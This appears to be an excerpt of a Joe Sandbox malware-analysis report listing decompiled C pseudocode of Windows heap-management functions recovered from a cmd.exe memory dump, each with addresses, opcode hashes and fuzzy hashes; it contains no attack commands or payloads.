                                                                                                                                          0x03be8b24
                                                                                                                                          0x03be8b2a
                                                                                                                                          0x03be8b2e
                                                                                                                                          0x03be8b3f
                                                                                                                                          0x03be8b78
                                                                                                                                          0x03be8b41
                                                                                                                                          0x03be8b52
                                                                                                                                          0x03be8b54
                                                                                                                                          0x03be8b5c
                                                                                                                                          0x03be8b74
                                                                                                                                          0x03be8b74
                                                                                                                                          0x03be8b5c
                                                                                                                                          0x03be8b3f
                                                                                                                                          0x03be8b5e
                                                                                                                                          0x03be8b61
                                                                                                                                          0x03be8b64
                                                                                                                                          0x03be8b64
                                                                                                                                          0x03be8b6c
                                                                                                                                          0x03be8b6c
                                                                                                                                          0x03be8b11
                                                                                                                                          0x03c39cd5
                                                                                                                                          0x03c39cd5
                                                                                                                                          0x03be8b17
                                                                                                                                          0x03be8b1a
                                                                                                                                          0x03be8b1a
                                                                                                                                          0x00000000
                                                                                                                                          0x03be8ad5
                                                                                                                                          0x03be8a89

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 16c471f20bcba76e5eadc94de6596ebdb399057dcd6860323a63ece7ba2f3d49
                                                                                                                                          • Instruction ID: 89eff5b2798f0632069ab58fc8c5b61eee19cb567f46683f10f0653e4662c60f
                                                                                                                                          • Opcode Fuzzy Hash: 16c471f20bcba76e5eadc94de6596ebdb399057dcd6860323a63ece7ba2f3d49
                                                                                                                                          • Instruction Fuzzy Hash: FC4180B4A0072C9BDB24DF29D888AA9B3F8FB44704F1442F9D919DB241E7719E80CF90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9AA16 Relevance: .1, Instructions: 120COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03C9AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E03C9ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E03C9AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E03C9AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E03C7CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L03BF77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E03BF7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E03C9131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E03C7CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                                                          0x03c9aa1f
                                                                                                                                          0x03c9aa21
                                                                                                                                          0x03c9aa23
                                                                                                                                          0x03c9aa2b
                                                                                                                                          0x03c9aa30
                                                                                                                                          0x03c9aa36
                                                                                                                                          0x03c9aa39
                                                                                                                                          0x03c9aa42
                                                                                                                                          0x03c9aa75
                                                                                                                                          0x03c9aa7a
                                                                                                                                          0x03c9aa7c
                                                                                                                                          0x03c9aa7c
                                                                                                                                          0x03c9aa88
                                                                                                                                          0x03c9aa8a
                                                                                                                                          0x03c9aa8f
                                                                                                                                          0x03c9ab02
                                                                                                                                          0x03c9ab04
                                                                                                                                          0x03c9aa99
                                                                                                                                          0x03c9aaa8
                                                                                                                                          0x03c9aaaf
                                                                                                                                          0x03c9aab3
                                                                                                                                          0x03c9aacc
                                                                                                                                          0x03c9aad1
                                                                                                                                          0x03c9aad6
                                                                                                                                          0x03c9aae0
                                                                                                                                          0x03c9aaf3
                                                                                                                                          0x03c9aaf9
                                                                                                                                          0x03c9aafe
                                                                                                                                          0x03c9aafe
                                                                                                                                          0x03c9aaf3
                                                                                                                                          0x03c9aad6
                                                                                                                                          0x03c9aab3
                                                                                                                                          0x03c9ab07
                                                                                                                                          0x03c9ab0a
                                                                                                                                          0x03c9ab11
                                                                                                                                          0x03c9ab23
                                                                                                                                          0x03c9ab13
                                                                                                                                          0x03c9ab1c
                                                                                                                                          0x03c9ab1c
                                                                                                                                          0x03c9ab2b
                                                                                                                                          0x03c9ab44
                                                                                                                                          0x03c9ab44
                                                                                                                                          0x03c9ab51
                                                                                                                                          0x03c9ab51
                                                                                                                                          0x03c9aa44
                                                                                                                                          0x03c9aa47
                                                                                                                                          0x03c9aa4c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aa5a
                                                                                                                                          0x03c9aa64
                                                                                                                                          0x03c9aa72
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aa66
                                                                                                                                          0x03c9aa66
                                                                                                                                          0x03c9aa68
                                                                                                                                          0x03c9aa6a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9aa6a

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                                          • Instruction ID: 231951c91d200f3a0a21853382c8595caaf530d6492b5e1c782429dc8e67d650
                                                                                                                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                                          • Instruction Fuzzy Hash: 4431F63AF10254ABEF15CB66CC49BAFF7BADF84650F0B406AE805EB251DE749E40C650
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA22AE Relevance: .1, Instructions: 116COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03CA22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E03CA21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x3bbac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x3bbac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x3bbac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x3bbac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x3cc6110; // 0x44ec91fe
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x3cc6110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E03BEFFB0(_t77, _t114, _t114);
						}
						_t63 = E03CA2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E03BF2280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                                                                                                                          0x03ca22b9
                                                                                                                                          0x03ca22c2
                                                                                                                                          0x03ca22c6
                                                                                                                                          0x03ca22c8
                                                                                                                                          0x03ca22d8
                                                                                                                                          0x03ca22e2
                                                                                                                                          0x03ca2303
                                                                                                                                          0x03ca2314
                                                                                                                                          0x03ca2321
                                                                                                                                          0x03ca234a
                                                                                                                                          0x03ca235b
                                                                                                                                          0x03ca236c
                                                                                                                                          0x03ca2372
                                                                                                                                          0x03ca2376
                                                                                                                                          0x03ca238f
                                                                                                                                          0x03ca238f
                                                                                                                                          0x03ca23b4
                                                                                                                                          0x03ca23c6
                                                                                                                                          0x03ca23c9
                                                                                                                                          0x03ca23cc
                                                                                                                                          0x03ca23cf
                                                                                                                                          0x03ca23cf
                                                                                                                                          0x03ca23e9
                                                                                                                                          0x03ca23ee
                                                                                                                                          0x03ca23f8
                                                                                                                                          0x03ca23fb
                                                                                                                                          0x03ca23fb
                                                                                                                                          0x03ca2403
                                                                                                                                          0x03ca240a
                                                                                                                                          0x03ca2378
                                                                                                                                          0x03ca237b
                                                                                                                                          0x03ca2381
                                                                                                                                          0x03ca2385
                                                                                                                                          0x03ca2385
                                                                                                                                          0x03ca238d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca238d
                                                                                                                                          0x03ca2376
                                                                                                                                          0x03ca2417

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b5563a2a02c8a05b54c74252b23ce81cdb1c35f28d3fc7dd84a5ac83640c7e65
                                                                                                                                          • Instruction ID: 886c483f18930bd202f841b1f19a8dd403d010f99c5b0b40c4cab7f9dcbcb6e4
                                                                                                                                          • Opcode Fuzzy Hash: b5563a2a02c8a05b54c74252b23ce81cdb1c35f28d3fc7dd84a5ac83640c7e65
                                                                                                                                          • Instruction Fuzzy Hash: 2941F3715083525FC354CF29C8A197ABBE1EF85229F094A5DF4D5CB282CB34D91AC791
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C9FDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                          			E03C9FDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E03C9FD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E03CA0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E03BF7D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E03C91608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E03CA2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E03C9C8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E03C9DBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E03BF7D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E03C9A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                                                          0x03c9fde7
                                                                                                                                          0x03c9fde8
                                                                                                                                          0x03c9fdec
                                                                                                                                          0x03c9fdee
                                                                                                                                          0x03c9fdf5
                                                                                                                                          0x03c9fdf7
                                                                                                                                          0x03c9fdfc
                                                                                                                                          0x03c9fe19
                                                                                                                                          0x03c9fe22
                                                                                                                                          0x03c9fe26
                                                                                                                                          0x03c9fec6
                                                                                                                                          0x03c9fecd
                                                                                                                                          0x03c9fed5
                                                                                                                                          0x03c9fee7
                                                                                                                                          0x03c9fed7
                                                                                                                                          0x03c9fee0
                                                                                                                                          0x03c9fee0
                                                                                                                                          0x03c9feef
                                                                                                                                          0x03c9ff00
                                                                                                                                          0x03c9ff02
                                                                                                                                          0x03c9ff07
                                                                                                                                          0x03c9ff07
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9feef
                                                                                                                                          0x03c9fe33
                                                                                                                                          0x03c9fe55
                                                                                                                                          0x03c9fe59
                                                                                                                                          0x03c9fe5b
                                                                                                                                          0x03c9fe5e
                                                                                                                                          0x03c9fe69
                                                                                                                                          0x03c9fe6d
                                                                                                                                          0x03c9fe6d
                                                                                                                                          0x03c9fe69
                                                                                                                                          0x03c9fe35
                                                                                                                                          0x03c9fe41
                                                                                                                                          0x03c9fe41
                                                                                                                                          0x03c9fe79
                                                                                                                                          0x03c9fe8b
                                                                                                                                          0x03c9fe7b
                                                                                                                                          0x03c9fe84
                                                                                                                                          0x03c9fe84
                                                                                                                                          0x03c9fe93
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9fea8
                                                                                                                                          0x03c9feba
                                                                                                                                          0x00000000
                                                                                                                                          0x03c9feba
                                                                                                                                          0x03c9fdfe
                                                                                                                                          0x03c9fe01
                                                                                                                                          0x03c9fe02
                                                                                                                                          0x03c9fe08
                                                                                                                                          0x03c9ff0c
                                                                                                                                          0x03c9ff14
                                                                                                                                          0x03c9ff14

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                          • Instruction ID: 69449e6c43a5d2a620a7447011d547b75a587dc62d71acdf919a637bb6cb5e56
                                                                                                                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                                          • Instruction Fuzzy Hash: DE31E336300640AFEB22DB69C84DF6ABBE9EB85651F1E449EE446CF342DA74DD41C720
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA20A8 Relevance: .1, Instructions: 114COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                          			E03CA20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x3cc6110; // 0x44ec91fe
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x3cc6110; // 0x44ec91fe
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E03CA2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x3cc6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E03CA2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x3cc6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E03CA2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x3cc6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x3cc6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                                                                                                                          0x03ca20a8
                                                                                                                                          0x03ca20b0
                                                                                                                                          0x03ca20b6
                                                                                                                                          0x03ca20ba
                                                                                                                                          0x03ca20be
                                                                                                                                          0x03ca20c4
                                                                                                                                          0x03ca20cb
                                                                                                                                          0x03ca20db
                                                                                                                                          0x03ca20e4
                                                                                                                                          0x03ca20e7
                                                                                                                                          0x03ca20e9
                                                                                                                                          0x03ca20ef
                                                                                                                                          0x03ca20f1
                                                                                                                                          0x03ca20fe
                                                                                                                                          0x03ca2102
                                                                                                                                          0x03ca2105
                                                                                                                                          0x03ca2105
                                                                                                                                          0x03ca2107
                                                                                                                                          0x03ca210d
                                                                                                                                          0x03ca2112
                                                                                                                                          0x03ca2115
                                                                                                                                          0x03ca2120
                                                                                                                                          0x03ca2120
                                                                                                                                          0x03ca2107
                                                                                                                                          0x03ca2126
                                                                                                                                          0x03ca2131
                                                                                                                                          0x03ca2133
                                                                                                                                          0x03ca213e
                                                                                                                                          0x03ca213e
                                                                                                                                          0x03ca2140
                                                                                                                                          0x03ca2146
                                                                                                                                          0x03ca214b
                                                                                                                                          0x03ca2156
                                                                                                                                          0x03ca2156
                                                                                                                                          0x03ca2140
                                                                                                                                          0x03ca215f
                                                                                                                                          0x03ca2165
                                                                                                                                          0x03ca2170
                                                                                                                                          0x03ca2172
                                                                                                                                          0x03ca217d
                                                                                                                                          0x03ca217d
                                                                                                                                          0x03ca217f
                                                                                                                                          0x03ca2185
                                                                                                                                          0x03ca2192
                                                                                                                                          0x03ca2192
                                                                                                                                          0x03ca217f
                                                                                                                                          0x03ca2170
                                                                                                                                          0x03ca2197
                                                                                                                                          0x03ca2199
                                                                                                                                          0x03ca21a1
                                                                                                                                          0x03ca21b1
                                                                                                                                          0x03ca21bf
                                                                                                                                          0x03ca21d6
                                                                                                                                          0x03ca21d6
                                                                                                                                          0x03ca21bf
                                                                                                                                          0x03ca21dd
                                                                                                                                          0x03ca21e5

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 2381fb4d9a3b995bcadbcfa04f415c409197aa7130cc047084a1727d6c22ee7c
                                                                                                                                          • Instruction ID: 29bd3fbdf09b7a82e230144bd5ef0abbc5e7bd5ab5ff52e0cb4e1690a781eee0
                                                                                                                                          • Opcode Fuzzy Hash: 2381fb4d9a3b995bcadbcfa04f415c409197aa7130cc047084a1727d6c22ee7c
                                                                                                                                          • Instruction Fuzzy Hash: F341DF33E1042A8BCB18DF68C49157AF3B1FB48309B5A06BDD905EB285DB35AE41DB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03CA2D07 Relevance: .1, Instructions: 112COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03CA2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E03CA21E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x3bbac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x3bbac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x3bbac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x3bbac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x3bbac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x3bbac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x3cc6110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x3cc6110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x3cc6110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E03BEB090(_v24, _t91, _v12, _t29);
			}
























                                                                                                                                          0x03ca2d1f
                                                                                                                                          0x03ca2d2c
                                                                                                                                          0x03ca2d31
                                                                                                                                          0x03ca2d33
                                                                                                                                          0x03ca2d42
                                                                                                                                          0x03ca2d4b
                                                                                                                                          0x03ca2d51
                                                                                                                                          0x03ca2d5d
                                                                                                                                          0x03ca2d62
                                                                                                                                          0x03ca2d6e
                                                                                                                                          0x03ca2d71
                                                                                                                                          0x03ca2d7d
                                                                                                                                          0x03ca2d87
                                                                                                                                          0x03ca2d8d
                                                                                                                                          0x03ca2d91
                                                                                                                                          0x03ca2da5
                                                                                                                                          0x03ca2db7
                                                                                                                                          0x03ca2dc8
                                                                                                                                          0x03ca2dcf
                                                                                                                                          0x03ca2dd1
                                                                                                                                          0x03ca2dd3
                                                                                                                                          0x03ca2dd6
                                                                                                                                          0x03ca2ddb
                                                                                                                                          0x03ca2ddd
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2ddf
                                                                                                                                          0x03ca2df5
                                                                                                                                          0x03ca2e0e
                                                                                                                                          0x03ca2e12
                                                                                                                                          0x03ca2e1a
                                                                                                                                          0x03ca2e1c
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2e14
                                                                                                                                          0x03ca2e16
                                                                                                                                          0x03ca2e22
                                                                                                                                          0x03ca2e22
                                                                                                                                          0x03ca2e18
                                                                                                                                          0x03ca2e18
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2e18
                                                                                                                                          0x03ca2e16
                                                                                                                                          0x03ca2df7
                                                                                                                                          0x03ca2df7
                                                                                                                                          0x03ca2dfc
                                                                                                                                          0x03ca2e04
                                                                                                                                          0x03ca2e06
                                                                                                                                          0x03ca2e1e
                                                                                                                                          0x03ca2e1e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2dfe
                                                                                                                                          0x03ca2e00
                                                                                                                                          0x03ca2e08
                                                                                                                                          0x03ca2e08
                                                                                                                                          0x03ca2e02
                                                                                                                                          0x03ca2e02
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2e02
                                                                                                                                          0x03ca2e00
                                                                                                                                          0x03ca2dfc
                                                                                                                                          0x00000000
                                                                                                                                          0x03ca2df5
                                                                                                                                          0x03ca2ddf
                                                                                                                                          0x03ca2e26
                                                                                                                                          0x03ca2e26
                                                                                                                                          0x03ca2e3c

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
